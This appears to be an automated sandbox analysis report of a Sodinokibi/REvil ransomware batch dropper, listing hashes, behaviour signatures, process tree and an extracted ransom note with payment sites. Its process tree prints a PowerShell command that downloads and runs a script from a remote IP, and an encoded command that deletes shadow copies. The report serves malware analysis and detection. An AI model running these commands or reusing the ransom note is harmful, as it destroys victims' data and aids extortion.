Overview

overview

10

Static

static

c9af7ca368...b4.bat

windows7_x64

10

c9af7ca368...b4.bat

windows10_x64

10

Analysis

  • max time kernel
    141s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    21-07-2020 03:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c9af7ca3680a5a25e788062683cc93b4.bat

  • Size

    219B

  • MD5

    dc0a4c0f80db22d5242cb4addeaa91f8

  • SHA1

    ac411eca6ffc942efad96a63d86307d77c9f0c2f

  • SHA256

    7de87ff14574bfdf6858a7cf58f8dad6ba484c372a9d5f4b4e3b6a4824d1a40a

  • SHA512

    ab01868327fdc22ac891fe45261dfa8f737060c5c797fd42296bb71b546f82d84bba3114be6c37b35dd17621dd0f953ecd53191c9664864e9aae983493117e5c

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4

Extracted

Path

C:\y5h61s8orj-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension y5h61s8orj. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/D2D55285718AB8B9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: t1DWc3bRapKeISLXJPAH1I9jxxdQTe9klRqgM8nlB+PcK5iw0xGuJGCF+2myFU03 Evntfy8GJixLem1Iy7oqxr6iFee3VVfw8P3HpWWNwjFvSzdo/IWCAHbuyHwQlbqA om5FyQ/fxxHbblFSO18HkP9mh3k21SWnghFJBLZkHwCI0WXgKeAa5gVJRBag2lgu 4LdyjOy6Gza+DpPcH8ByHH6FJd9mfp8KJbcJHTP+c8uMY+a7VwhN9U5SaavDjBym qZn0RQf7Mpk0squoVz0MNjGDkn/WaVFGM25ShSG8wI8mSjRDsr6cuVDebd+6sxw1 6dKNRH7s+kkYvTGwef0qbJHW6+emZ2PonDUpUe3xhPBHCOdhq0eCgzfQs4+iKpeF XY8vY9X1xmIhzA8mwh2PKHm2hq0UPxXzD/8ycNIeE4Iln2uC53CDyUpDmeWdyGrK /YIh7j90mvuPUTPjoXonIU9nHdB6ZW9LcJnl8JCP/f0P32Bd7JwMOJvoX+2Fdy+N whGIp8wo+eEnDrjnQ4LmrPqBbUkYAwtjvPuzO3N2kGAJkfuVPN97j2VoY1MGb/4B KdWHXvLoMcmTTacPuXvAdp20EhlMNucpnSE3iVgYfUGQWZwrg6edapOQRRfWZvTA lDD6szeVH2rFQWNV28IbDF/g/EgPz83zSoDXpxZP2E1DcAU7Es9vPbNp/XYRCQOf Xoo7zCt1i2bar9lP57asgqzEFum4Nb03G4N28z7TjS5maCAPH8OWmYHvP70FNWjQ /xUyXvWu9FXFoFKU4uapMzpOPdkUdazOeesihj+eOPKwYRxAmLGudSPrf3tvcXrH 7ivsxyo+JoQ4mLDpcbFOrkAEeIZir8kPtukjb1TJbhne/7YbSNtlp5mr/4equS4T lfmxMf8htRjoLc86h0MLSJshTZAG2iQ0zJsHcWSjQQnL+Os8J+m+FPIgsjJV5S7D +YcV5SLR+Ofo9c74RwHFouX6N/PMKQA0q/rtAeW0FSOoRHG8lBt5v4kxt3iBxHt8 S6RLYy6R9UVnltIECNtKMXgwtMCH6dHtVNydHDKKZw6qC9Uw1C7N99yFrz7v+rAb PdFCyxahXp4YIkHonhY5egnXU2K38GSH7dTDEQpztjJqYoqOyb407tGK/8RfHFuV vCByFuXG1jKUAXilIZDGpJ0t5jOr24vSLGANRMG2lCd+bieCGMRn6MOota1PZLiZ nnTsYbc+TkKmvrf92EmPOLPP7BEFcx4reAefuVgazuFMLgKAAEGv+FsinIR703mC xgUF/f9GcF+qKnQJZSIRQHpQUn7rcRD/I0waoItLwwWGfAY288S5bw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9

http://decryptor.cc/D2D55285718AB8B9

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c9af7ca3680a5a25e788062683cc93b4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4');Invoke-NZFRVEJKWUXV;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      PID:1388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1504
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:740

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit

  • memory/1388-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1388-14-0x0000000008FE0000-0x0000000009365000-memory.dmp

    Filesize

    3.5MB

    Download

  • memory/1504-3-0x0000000000000000-mapping.dmp

    Download